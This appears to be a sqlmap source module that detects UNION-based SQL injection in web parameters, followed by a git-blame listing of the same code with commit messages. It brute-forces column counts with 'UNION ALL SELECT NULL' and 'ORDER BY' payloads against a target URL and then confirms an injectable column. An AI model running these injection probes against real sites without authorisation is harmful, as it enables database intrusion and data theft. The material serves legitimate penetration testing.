sqlmap/lib/techniques/inband/union/test.py

#!/usr/bin/env python

"""
$Id$

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.agent import agent
from lib.core.common import randomStr
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.session import setUnion
from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser
from lib.request.connect import Connect as Request

def __unionPosition(negative=False, falseCond=False):
    validPayload = None

    if negative or falseCond:
        negLogMsg = "partial (single entry)"
    else:
        negLogMsg = "full"

    infoMsg  = "confirming %s inband sql injection on parameter " % negLogMsg
    infoMsg += "'%s'" % kb.injParameter

    if negative:
        infoMsg += " with negative parameter value"
    elif falseCond:
        infoMsg += " by appending a false condition after the parameter value"

    logger.info(infoMsg)

    # For each column of the table (# of NULL) perform a request using
    # the UNION ALL SELECT statement to test it the target url is
    # affected by an exploitable inband SQL injection vulnerability
    for exprPosition in range(0, kb.unionCount):
        # Prepare expression with delimiters
        randQuery = randomStr()
        randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
        randQueryUnescaped = unescaper.unescape(randQueryProcessed)

        # Forge the inband SQL injection request
        query   = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)
        payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)

        # Perform the request
        resultPage, _ = Request.queryPage(payload, content=True)

        # We have to assure that the randQuery value is not within the
        # HTML code of the result page because, for instance, it is there
        # when the query is wrong and the back-end DBMS is Microsoft SQL
        # server
        htmlParsed = htmlParser(resultPage)

        if resultPage and randQuery in resultPage and not htmlParsed:
            setUnion(position=exprPosition)
            validPayload = payload

            break

    if isinstance(kb.unionPosition, int):
        infoMsg  = "the target url is affected by an exploitable "
        infoMsg += "%s inband sql injection vulnerability " % negLogMsg
        infoMsg += "on parameter '%s'" % kb.injParameter
        logger.info(infoMsg)
    else:
        warnMsg  = "the target url is not affected by an exploitable "
        warnMsg += "%s inband sql injection vulnerability " % negLogMsg
        warnMsg += "on parameter '%s'" % kb.injParameter

        if negLogMsg == "partial":
            warnMsg += ", sqlmap will retrieve the query output "
            warnMsg += "through blind sql injection technique"

        logger.warn(warnMsg)

    return validPayload

def __unionConfirm():
    validPayload = None

    # Confirm the inband SQL injection and get the exact column
    # position
    if not isinstance(kb.unionPosition, int):
        validPayload = __unionPosition()

        # Assure that the above function found the exploitable full inband
        # SQL injection position
        if not isinstance(kb.unionPosition, int):
            validPayload = __unionPosition(negative=True)

            # Assure that the above function found the exploitable partial
            # (single entry) inband SQL injection position with negative
            # parameter validPayload
            if not isinstance(kb.unionPosition, int):
                validPayload = __unionPosition(falseCond=True)

                # Assure that the above function found the exploitable partial
                # (single entry) inband SQL injection position by appending
                # a false condition after the parameter validPayload
                if not isinstance(kb.unionPosition, int):
                    return
                else:
                    setUnion(falseCond=True)
            else:
                setUnion(negative=True)

    return validPayload

def __unionTestByNULLBruteforce(comment):
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 50 columns
    on the target database table
    """

    columns = None
    query   = agent.prefixQuery("UNION ALL SELECT NULL")

    for count in range(0, 50):
        if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):
            query = query[:-len(" FROM DUAL")]

        if count:
            query += ", NULL"

        if kb.dbms == DBMS.ORACLE:
            query += " FROM DUAL"

        commentedQuery = agent.postfixQuery(query, comment)
        payload        = agent.payload(newValue=commentedQuery)
        seqMatcher     = Request.queryPage(payload, getSeqMatcher=True)

        if seqMatcher >= 0.6:
            columns = count + 1

            break

    return columns

def __unionTestByOrderBy(comment):
    columns     = None
    prevPayload = ""

    for count in range(1, 51):
        query        = agent.prefixQuery("ORDER BY %d" % count)
        orderByQuery = agent.postfixQuery(query, comment)
        payload      = agent.payload(newValue=orderByQuery)
        seqMatcher   = Request.queryPage(payload, getSeqMatcher=True)

        if seqMatcher >= 0.6:
            columns = count

        elif columns:
            break

        prevPayload = payload

    return columns

def unionTest():
    """
    This method tests if the target url is affected by an inband
    SQL injection vulnerability. The test is done up to 3*50 times
    """

    if conf.direct:
        return

    if kb.unionCount is not None and kb.unionPosition is not None:
        return

    if conf.uTech == "orderby":
        technique = "ORDER BY clause bruteforcing"
    else:
        technique = "NULL bruteforcing"

    infoMsg  = "testing inband sql injection on parameter "
    infoMsg += "'%s' with %s technique" % (kb.injParameter, technique)
    logger.info(infoMsg)

    validPayload = None
    columns = None

    for comment in (queries[kb.dbms].comment.query, ""):
        if conf.uTech == "orderby":
            columns = __unionTestByOrderBy(comment)
        else:
            columns = __unionTestByNULLBruteforce(comment)

        if columns:
            setUnion(comment=comment, count=columns)

            break

    if kb.unionCount:
        validPayload = __unionConfirm()
    else:
        warnMsg  = "the target url is not affected by an "
        warnMsg += "inband sql injection vulnerability"
        logger.warn(warnMsg)

    if validPayload is None:
        validPayload = ""

    return validPayload
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`#!/usr/bin/env python`

			`"""`
propsets.. 2008-10-15 19:56:32 +04:00			$Id$
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
large commit with copyright header modifications 2010-10-14 18:41:14 +04:00			`Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)`
sorry, cosmetics 2010-10-15 03:18:29 +04:00			`See the file 'doc/COPYING' for copying permission`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`

			`from lib.core.agent import agent`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.common import randomStr`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.data import conf`
			`from lib.core.data import kb`
			`from lib.core.data import logger`
Minor improvement when testing for UNION query SQL injection to check only without comment and with DBMS specific comment (not anymore "random" unspecific comment characters) 2008-12-02 02:09:07 +03:00			`from lib.core.data import queries`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.core.session import setUnion`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`from lib.core.unescaper import unescaper`
			`from lib.parse.html import htmlParser`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`from lib.request.connect import Connect as Request`

Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`def __unionPosition(negative=False, falseCond=False):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if negative or falseCond:`
			`negLogMsg = "partial (single entry)"`
			`else:`
			`negLogMsg = "full"`

			`infoMsg = "confirming %s inband sql injection on parameter " % negLogMsg`
			`infoMsg += "'%s'" % kb.injParameter`

			`if negative:`
			`infoMsg += " with negative parameter value"`
			`elif falseCond:`
			`infoMsg += " by appending a false condition after the parameter value"`

			`logger.info(infoMsg)`

			`# For each column of the table (# of NULL) perform a request using`
			`# the UNION ALL SELECT statement to test it the target url is`
			`# affected by an exploitable inband SQL injection vulnerability`
			`for exprPosition in range(0, kb.unionCount):`
			`# Prepare expression with delimiters`
			`randQuery = randomStr()`
			`randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)`
			`randQueryUnescaped = unescaper.unescape(randQueryProcessed)`

			`# Forge the inband SQL injection request`
			`query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)`
			`payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)`

			`# Perform the request`
			`resultPage, _ = Request.queryPage(payload, content=True)`

			`# We have to assure that the randQuery value is not within the`
			`# HTML code of the result page because, for instance, it is there`
			`# when the query is wrong and the back-end DBMS is Microsoft SQL`
			`# server`
			`htmlParsed = htmlParser(resultPage)`

minor fix 2010-09-13 19:22:29 +04:00			`if resultPage and randQuery in resultPage and not htmlParsed:`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`setUnion(position=exprPosition)`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = payload`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`break`

			`if isinstance(kb.unionPosition, int):`
			`infoMsg = "the target url is affected by an exploitable "`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`infoMsg += "%s inband sql injection vulnerability " % negLogMsg`
			`infoMsg += "on parameter '%s'" % kb.injParameter`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info(infoMsg)`
			`else:`
			`warnMsg = "the target url is not affected by an exploitable "`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`warnMsg += "%s inband sql injection vulnerability " % negLogMsg`
			`warnMsg += "on parameter '%s'" % kb.injParameter`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`if negLogMsg == "partial":`
			`warnMsg += ", sqlmap will retrieve the query output "`
			`warnMsg += "through blind sql injection technique"`

			`logger.warn(warnMsg)`

Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`return validPayload`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`def __unionConfirm():`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`# Confirm the inband SQL injection and get the exact column`
			`# position`
			`if not isinstance(kb.unionPosition, int):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = __unionPosition()`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Assure that the above function found the exploitable full inband`
			`# SQL injection position`
			`if not isinstance(kb.unionPosition, int):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = __unionPosition(negative=True)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Assure that the above function found the exploitable partial`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`# (single entry) inband SQL injection position with negative`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`# parameter validPayload`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if not isinstance(kb.unionPosition, int):`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = __unionPosition(falseCond=True)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00
			`# Assure that the above function found the exploitable partial`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`# (single entry) inband SQL injection position by appending`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`# a false condition after the parameter validPayload`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`if not isinstance(kb.unionPosition, int):`
			`return`
			`else:`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`setUnion(falseCond=True)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`else:`
Major bug fix to --union-test 2010-10-26 03:39:55 +04:00			`setUnion(negative=True)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`return validPayload`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
			`def __unionTestByNULLBruteforce(comment):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 50 columns`
			`on the target database table`
			`"""`

Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`columns = None`
Minor code adjustments 2010-10-25 18:11:47 +04:00			`query = agent.prefixQuery("UNION ALL SELECT NULL")`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`for count in range(0, 50):`
refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`if kb.dbms == DBMS.ORACLE and query.endswith(" FROM DUAL"):`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`query = query[:-len(" FROM DUAL")]`

			`if count:`
			`query += ", NULL"`

refactoring of hard coded dbms names 2010-11-02 14:59:24 +03:00			`if kb.dbms == DBMS.ORACLE:`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`query += " FROM DUAL"`

			`commentedQuery = agent.postfixQuery(query, comment)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`payload = agent.payload(newValue=commentedQuery)`
			`seqMatcher = Request.queryPage(payload, getSeqMatcher=True)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`if seqMatcher >= 0.6:`
			`columns = count + 1`

			`break`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00			`return columns`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`def __unionTestByOrderBy(comment):`
Minor bug fixes to --os-shell (altought web backdoor functionality still to be reviewed). Minor common library code refactoring. Code cleanup. Set back the default User-Agent to sqlmap for comparison algorithm reasons. Updated THANKS. 2009-04-28 03:05:11 +04:00			`columns = None`
			`prevPayload = ""`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
			`for count in range(1, 51):`
Minor code adjustments 2010-10-25 18:11:47 +04:00			`query = agent.prefixQuery("ORDER BY %d" % count)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`orderByQuery = agent.postfixQuery(query, comment)`
			`payload = agent.payload(newValue=orderByQuery)`
			`seqMatcher = Request.queryPage(payload, getSeqMatcher=True)`

			`if seqMatcher >= 0.6:`
			`columns = count`
Minor layout adjustments to --union-tech 2008-12-29 21:48:23 +03:00
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`elif columns:`
			`break`

			`prevPayload = payload`

fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00			`return columns`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`def unionTest():`
			`"""`
			`This method tests if the target url is affected by an inband`
			`SQL injection vulnerability. The test is done up to 3*50 times`
			`"""`

Major enhancement to directly connect to the dbms without passing via a sql injection: adapted code accordingly - see #158. This feature relies on python third-party libraries to be able to connect to the database. For the moment it has been implemented for MySQL (with python-mysqldb module) and PostgreSQL (with python-psycopg2 module). Minor layout adjustments. 2010-03-27 02:23:25 +03:00			`if conf.direct:`
			`return`

Minor bug fix to correctly resuming --union-test results from session file. 2010-05-19 18:21:59 +04:00			`if kb.unionCount is not None and kb.unionPosition is not None:`
			`return`

Minor layout adjustments to --union-tech 2008-12-29 21:48:23 +03:00			`if conf.uTech == "orderby":`
			`technique = "ORDER BY clause bruteforcing"`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`else:`
			`technique = "NULL bruteforcing"`

Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`infoMsg = "testing inband sql injection on parameter "`
Minor adjustments 2010-01-15 20:42:46 +03:00			`infoMsg += "'%s' with %s technique" % (kb.injParameter, technique)`
Updated to sqlmap 0.7 release candidate 1 2009-04-22 15:48:07 +04:00			`logger.info(infoMsg)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = None`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`columns = None`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
removed queriesfile.py, implemented XMLObject approach (still shell.py and udf.py TODO) 2010-10-21 17:13:12 +04:00			`for comment in (queries[kb.dbms].comment.query, ""):`
Minor layout adjustments to --union-tech 2008-12-29 21:48:23 +03:00			`if conf.uTech == "orderby":`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00			`columns = __unionTestByOrderBy(comment)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00			`else:`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00			`columns = __unionTestByNULLBruteforce(comment)`
Minor enhancement to support an option (--union-tech) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause. 2008-12-22 00:39:53 +03:00
			`if columns:`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00			`setUnion(comment=comment, count=columns)`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00
			`break`

			`if kb.unionCount:`
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`validPayload = __unionConfirm()`
After the storm, a restore.. 2008-10-15 19:38:22 +04:00			`else:`
			`warnMsg = "the target url is not affected by an "`
			`warnMsg += "inband sql injection vulnerability"`
			`logger.warn(warnMsg)`

Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`if validPayload is None:`
			`validPayload = ""`
fixes #181 - proper save/resume information about single entry UNION SQL injection 2010-03-22 18:39:29 +03:00
Consolidate logger messages for --*-test switches 2010-10-31 19:58:38 +03:00			`return validPayload`